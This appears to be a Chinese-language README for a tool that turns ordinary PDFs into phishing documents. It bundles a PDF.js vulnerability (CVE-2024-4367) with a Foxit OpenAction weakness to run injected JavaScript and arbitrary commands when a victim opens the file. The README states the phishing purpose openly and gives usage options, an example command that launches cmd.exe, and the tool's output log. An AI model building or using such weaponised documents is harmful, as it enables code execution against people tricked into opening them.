项目介绍
集成近期的一些pdf解析器的漏洞,制作PDF文档,用户可以通过改脚本来构造钓鱼文档进行社工钓鱼操作
使用方法
➜ pdf-exploit ./pdf.py --help
usage: pdf-exploit [-h] -f F [-p P] -o O [-pdfjs PDFJS] [-foxit-exec FOXIT_EXEC] [-foxit-args FOXIT_ARGS]
options:
-h, --help show this help message and exit
-f F the harmless pdf path
-p P password
-o O the new pdf file
pdfjs:
CVE-2024-4367
-pdfjs PDFJS javascript to be executed, example: alert(3)
foxit:
foxit pdf 'flawed design' explotation
-foxit-exec FOXIT_EXEC
-foxit-args FOXIT_ARGS
使用示例如下:
➜ pdf-exploit ./pdf.py -f ~/Downloads/data.pdf -o /tmp/data.pdf -pdfjs 'alert(3)' -foxit-exec cmd.exe -foxit-args "/c calc.exe"
[+] use the PDF.JS exploit: alert(3)
[+] make a text pdf
[+] make evil font
[+] fd ref: 9
[+] add font object to pdf: 10
[+] set font: /F1
[+] use the foxit exploit: cmd.exe /c calc.exe
set OpenAction to Catalog done
[+] store to /tmp/data.pdf
漏洞集成
目前支持: